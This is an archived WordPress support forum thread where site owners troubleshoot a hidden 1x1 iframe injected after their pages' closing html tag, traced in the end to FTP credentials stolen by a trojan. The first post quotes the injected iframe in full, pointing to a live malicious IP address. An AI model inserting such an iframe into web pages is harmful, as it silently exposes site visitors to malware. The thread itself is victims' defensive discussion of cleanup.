WordPress.org

Ready to get started?Download WordPress

Forums

iframe tag after html close (11 posts)

  1. jonhinch
    Member
    Posted 4 years ago #

    Hi I have just moved up to version 2.9.1 and I have noticed a problem with my site.

    I am getting an extra line added at the end of the code

    </html><iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>

    which is fine in Explorer but in firefox it makes my page jump to the bottom.

    I don't like the look of the good and searching through my sources I can't seem to find it or anything close.

    I have tried suspending plugins and then switch themes but it still appeared. Now I am a bit stumped and concerned.

    I had to update the database to move to 2.9.1. Can I reverse the release out or no I need to find how the code is made?

  2. jonhinch
    Member
    Posted 4 years ago #

    Mmm I have noticed it is happening with a 2.8 installation too.

    I am wondering if I have a virus somewhere. I have tried it on different machines and in different browsers. How can extra code get added?

  3. nandayo
    Member
    Posted 4 years ago #

    Jon,

    same here. Check out every index.php file in your folders and remove the line. I had to remove the lines from 5 files (/, /plugins/index.php, /wp-content/index.php and /wp-content/themes/*/index.php & /footer.php

    I had it since 2 days and it MUST be some WP plugin because I didn't do anything but upgrading some plugins. Maybe some statistic tracker? I have no idea and I'm too scared to find out ;)

    Hope that helps!

  4. nandayo
    Member
    Posted 4 years ago #

    PS: Better change your FTP password ASAP after removing all lines I think :(

  5. nandayo
    Member
    Posted 4 years ago #

    ... and it didn't help. After an hour the spam thing was back again in every single file.

  6. jonhinch
    Member
    Posted 4 years ago #

    I have done text level searches of all the code for "iframe" and nothing looked wrong.
    The index.php etc all are free off this code.
    Does anyone know where I can find a list of what is called when? Or know what sources I need to check for routines that are called after the last </html>?
    Is it possible for something outside of wordpress to tag an extra line on?
    I did wonder if it was google analytics or something but I don't see how it can be.

  7. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    is probably a good place to start...no plugins I use, or analytics, or anything like that adds in an iframe.....nor does WP itself...so it looks more and more like a hack

    There's many ways for code to be inserted into your source....from rogue files stuck on your server, stuff in your DB, etc.

  8. nandayo
    Member
    Posted 4 years ago #

    Found any solution, Jon? Here the iframe tag comes back after 24 hours. Now Google even warns customers:

    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://91.201.28.6/goods/index.php&client=chromium&hl=en-US

  9. Jon Henwood
    Member
    Posted 4 years ago #

    Hi Folks

    I had the same problem and discovered that it is actually a trojgen that sits on your computer that you use to access your ftp. What it does is get the ftp passwords of any hosting accounts that you upload to from that computer. It then (or some one at the other end) adds that <iframe> tag.

    To fix this...
    - Update your virus scanner and scan your machine
    - Change all your ftp passwords
    - Up date to the latest cgi script (wordpress / joomla/etc)
    - Go through all the index files in each site you ftp and remove the tag

  10. Jon Henwood
    Member
    Posted 4 years ago #

    An update to the last post...

    make sure you check all index files (there could be over 100 depending on your sites plugins and functionality) as it affects them all

  11. nandayo
    Member
    Posted 4 years ago #

    Helped. Thanks a lot, Jon!

Topic Closed

This topic has been closed to new replies.

About this Topic